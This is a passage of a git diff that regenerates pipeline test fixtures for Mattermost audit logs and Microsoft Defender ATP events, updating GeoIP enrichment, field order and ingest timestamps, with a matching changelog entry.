@@ -2197,45 +2281,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" - } - }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y", - "original": "/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:18:13.183Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209631447Z", - "original": "{\"timestamp\":\"2021-12-05 00:18:13.183 Z\",\"event\":\"removeTeamMember\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y\",\"team\":{\"id\":\"dqpybz1o3pbuzf7876u834nura\",\"name\":\"another-team\",\"type\":\"O\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543311441Z", + "original": "{\"timestamp\":\"2021-12-05 00:18:13.183 
Z\",\"event\":\"removeTeamMember\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y\",\"team\":{\"id\":\"dqpybz1o3pbuzf7876u834nura\",\"name\":\"another-team\",\"type\":\"O\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "removeTeamMember", "category": [ @@ -2262,6 +2330,10 @@ } } }, + "url": { + "path": "/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y", + "original": "/api/v4/teams/dqpybz1o3pbuzf7876u834nura/members/ag99yu4i1if63jrui63tsmq57y" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2274,9 +2346,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:18:17.907Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -2290,45 +2377,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all", - "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:18:17.907Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209636796Z", - "original": "{\"timestamp\":\"2021-12-05 00:18:17.907 Z\",\"event\":\"revokeAllSessionsForUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543312831Z", + "original": "{\"timestamp\":\"2021-12-05 00:18:17.907 
Z\",\"event\":\"revokeAllSessionsForUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "revokeAllSessionsForUser", "category": [ @@ -2342,6 +2413,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all", + "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/sessions/revoke/all" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2354,9 +2429,25 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T01:02:56.163Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "other1", + "cuk45yubk3nq8g7udrhojbk8ty" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "patch": { 
@@ -2375,46 +2466,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/me/patch", - "original": "/api/v4/users/me/patch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T01:02:56.163Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "other1", - "cuk45yubk3nq8g7udrhojbk8ty" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209641989Z", - "original": "{\"timestamp\":\"2021-12-05 01:02:56.163 Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"session_id\":\"6s4sy7p1b3fqdc3fktsh4yznhr\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"name\":\"other1\",\"roles\":\"system_user system_admin\"},\"user\":{\"id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"name\":\"other\",\"roles\":\"system_user system_admin\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543314237Z", + "original": "{\"timestamp\":\"2021-12-05 01:02:56.163 
Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"session_id\":\"6s4sy7p1b3fqdc3fktsh4yznhr\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"name\":\"other1\",\"roles\":\"system_user system_admin\"},\"user\":{\"id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"name\":\"other\",\"roles\":\"system_user system_admin\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchUser", "category": [ @@ -2440,6 +2514,10 @@ "id": "cuk45yubk3nq8g7udrhojbk8ty" } }, + "url": { + "path": "/api/v4/users/me/patch", + "original": "/api/v4/users/me/patch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2452,9 +2530,25 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T01:13:26.358Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y", + "cuk45yubk3nq8g7udrhojbk8ty" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -2478,46 +2572,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", - "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T01:13:26.358Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y", - "cuk45yubk3nq8g7udrhojbk8ty" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209647234Z", - "original": "{\"timestamp\":\"2021-12-05 01:13:26.358 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":1,\"errors\":\"[]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543315678Z", + "original": "{\"timestamp\":\"2021-12-05 01:13:26.358 
Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":1,\"errors\":\"[]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "addTeamMembers", "category": [ @@ -2541,6 +2618,10 @@ } } }, + "url": { + "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", + "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2553,9 +2634,25 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T01:13:08.904Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y", + "cuk45yubk3nq8g7udrhojbk8ty" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -2584,46 +2681,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", - "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T01:13:08.904Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y", - "cuk45yubk3nq8g7udrhojbk8ty" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209652346Z", - "original": "{\"timestamp\":\"2021-12-05 01:13:08.904 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":1,\"errors\":\"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. 
Contact your System Administrator for additional details., ]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543317073Z", + "original": "{\"timestamp\":\"2021-12-05 01:13:08.904 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":1,\"errors\":\"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "addTeamMembers", "category": [ @@ -2647,6 +2727,10 @@ } } }, + "url": { + "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", + "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", 
@@ -2659,9 +2743,26 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T01:20:06.246Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y", + "cuk45yubk3nq8g7udrhojbk8ty", + "z63ehbxy47fwpc8bmz9ouuh7fe" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -2691,47 +2792,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", - "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T01:20:06.246Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y", - "cuk45yubk3nq8g7udrhojbk8ty", - "z63ehbxy47fwpc8bmz9ouuh7fe" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209658600Z", - "original": "{\"timestamp\":\"2021-12-05 01:20:06.246 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":2,\"errors\":\"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., z63ehbxy47fwpc8bmz9ouuh7fe:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. 
Contact your System Administrator for additional details., ]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty z63ehbxy47fwpc8bmz9ouuh7fe]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543318483Z", + "original": "{\"timestamp\":\"2021-12-05 01:20:06.246 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":2,\"errors\":\"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., z63ehbxy47fwpc8bmz9ouuh7fe:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty z63ehbxy47fwpc8bmz9ouuh7fe]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "addTeamMembers", "category": [ @@ -2756,6 +2839,10 @@ } } }, + "url": { + "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", + "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", 
@@ -2768,7 +2855,10 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "mattermost": { @@ -2816,7 +2906,7 @@ ] }, "event": { - "ingested": "2021-12-08T15:26:55.209664049Z", + "ingested": "2021-12-15T08:59:12.543319861Z", "original": "{\"timestamp\":\"2021-12-05 17:21:36.724 Z\",\"event\":\"deleteTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"5timirrr5785mb3q1wutb5unrr\",\"ip_address\":\"127.0.0.1\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"mmctl/5.31.0 (linux)\"}", "kind": "event", "action": "deleteTeam", @@ -2848,6 +2938,19 @@ } }, { + "@timestamp": "2021-12-05T17:24:33.077Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y", + "z63ehbxy47fwpc8bmz9ouuh7fe" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -2861,46 +2964,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active", - "original": "/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T17:24:33.077Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y", - "z63ehbxy47fwpc8bmz9ouuh7fe" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209669419Z", - "original": "{\"timestamp\":\"2021-12-05 17:24:33.077 Z\",\"event\":\"updateUserActive\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"jnqqnh3onjympe4u8pa5mgtexw\",\"ip_address\":\"55.33.6.7\",\"active\":false,\"api_path\":\"/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active\",\"user\":{\"id\":\"z63ehbxy47fwpc8bmz9ouuh7fe\",\"name\":\"other2\",\"roles\":\"system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543321234Z", + "original": "{\"timestamp\":\"2021-12-05 17:24:33.077 
Z\",\"event\":\"updateUserActive\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"jnqqnh3onjympe4u8pa5mgtexw\",\"ip_address\":\"89.160.20.156\",\"active\":false,\"api_path\":\"/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active\",\"user\":{\"id\":\"z63ehbxy47fwpc8bmz9ouuh7fe\",\"name\":\"other2\",\"roles\":\"system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "updateUserActive", "category": [ @@ -2923,6 +3009,10 @@ "id": "z63ehbxy47fwpc8bmz9ouuh7fe" } }, + "url": { + "path": "/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active", + "original": "/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2935,7 +3025,10 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/microsoft/changelog.yml b/packages/microsoft/changelog.yml index e148fe8e1e2..c37727bca60 100644 --- a/packages/microsoft/changelog.yml +++ b/packages/microsoft/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.0" changes: - description: Add deprecation message in readme. diff --git a/packages/microsoft/data_stream/defender_atp/_dev/test/pipeline/test-defenderatp.log-expected.json b/packages/microsoft/data_stream/defender_atp/_dev/test/pipeline/test-defenderatp.log-expected.json index fbb2eec4780..6123c789979 100644 --- a/packages/microsoft/data_stream/defender_atp/_dev/test/pipeline/test-defenderatp.log-expected.json 
+++ b/packages/microsoft/data_stream/defender_atp/_dev/test/pipeline/test-defenderatp.log-expected.json @@ -69,7 +69,7 @@ "end" ], "duration": 0, - "ingested": "2021-06-09T11:57:25.803509100Z", + "ingested": "2021-12-14T14:48:13.578834551Z", "provider": "defender_atp", "action": "Malware", "end": "2020-06-30T10:07:44.333733Z", @@ -172,7 +172,7 @@ "start" ], "duration": 2442699369800, - "ingested": "2021-06-09T11:57:25.803531Z", + "ingested": "2021-12-14T14:48:13.578838209Z", "provider": "defender_atp", "action": "DefenseEvasion", "end": "2020-06-30T09:45:39.5484377Z", @@ -262,7 +262,7 @@ "start" ], "duration": 2442699369800, - "ingested": "2021-06-09T11:57:25.803537900Z", + "ingested": "2021-12-14T14:48:13.578838693Z", "provider": "defender_atp", "action": "DefenseEvasion", "end": "2020-06-30T09:45:39.5484377Z", @@ -353,7 +353,7 @@ "end" ], "duration": 892514711800, - "ingested": "2021-06-09T11:57:25.803543400Z", + "ingested": "2021-12-14T14:48:13.578839087Z", "provider": "defender_atp", "action": "Malware", "end": "2020-06-30T09:46:15.0876676Z", diff --git a/packages/microsoft/data_stream/dhcp/_dev/test/pipeline/test-generated.log-expected.json b/packages/microsoft/data_stream/dhcp/_dev/test/pipeline/test-generated.log-expected.json index 7f4e3206a9a..0c19729b67c 100644 --- a/packages/microsoft/data_stream/dhcp/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/microsoft/data_stream/dhcp/_dev/test/pipeline/test-generated.log-expected.json 
